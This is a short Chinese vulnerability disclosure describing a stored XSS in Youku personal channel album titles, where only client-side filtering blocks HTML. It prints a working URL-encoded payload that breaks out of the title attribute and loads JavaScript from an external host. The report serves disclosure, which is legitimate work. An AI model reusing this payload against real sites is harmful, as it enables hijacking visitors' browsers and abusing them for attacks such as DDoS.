优酷个人频道（XXX的频道）存在存储型XSS，可加载并允许执行任意外部js代码。如为网络红人，可绑架DDoS僵尸。说来是个毫无水准的洞，但是危害性不小。

漏洞存在于XXX的频道页面，专辑标题编辑处只做了前端JS过滤，直接发request可以随便提交任意HTML代码。

如下图，




页面回显做了encode，可是title没有做。导致可以注入HTML。测试后发现可以随便插入<script src>引用外站js，并可以顺利执行。于是写了一个有营养的利用代码，把原来的DIV隐藏掉，显示自己的DIV，并执行我的remote js文件打印一段话在页面上，顺便弹框。利用代码如下：

%22%3E%3Cscript%20src%3D%22http%3A%2F%2Fweichch.apphb.com%2Fxss.js%22%3E%3C%2Fscript%3EMalware%20Tag%3Cspan%20class%3D%22append%22%3E%3Ca%20href%3D%22%2Fu%2FUMTYzMjk4NDk5Mg%3D%3D%2Fvideos%22%3E(0)%3C%2Fa%3E%3C%2Fspan%3E%3C%2Fdiv%3E%3Cdiv%20style%3D%22display%3Anone%22%3E

访问个人频道即可触发，效果见漏洞证明部分。